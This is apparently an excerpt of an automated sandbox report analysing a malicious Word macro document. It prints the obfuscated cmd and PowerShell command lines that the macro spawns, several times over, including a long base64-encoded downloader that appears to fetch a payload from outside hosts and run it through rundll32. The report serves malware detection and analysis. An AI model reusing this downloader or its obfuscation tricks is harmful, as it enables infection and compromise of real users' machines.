                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: <ystem.pdbD source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.pdblogwW source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094801534.0000000002780000.00000002.00000001.sdmp
                      Source: Bestand.docInitial sample: OLE summary subject = didactic Intelligent system Incredible Wooden Sausages Developer Practical Plastic Cheese port Awesome Fresh Chicken Maine

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: Bestand.docStream path 'Macros/VBA/A81c_pcot0t3c8' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module A81c_pcot0t3c8Name: A81c_pcot0t3c8
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkA
                      PowerShell case anomaly foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAO
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOJump to behavior
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAO
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret 7_2_10008098
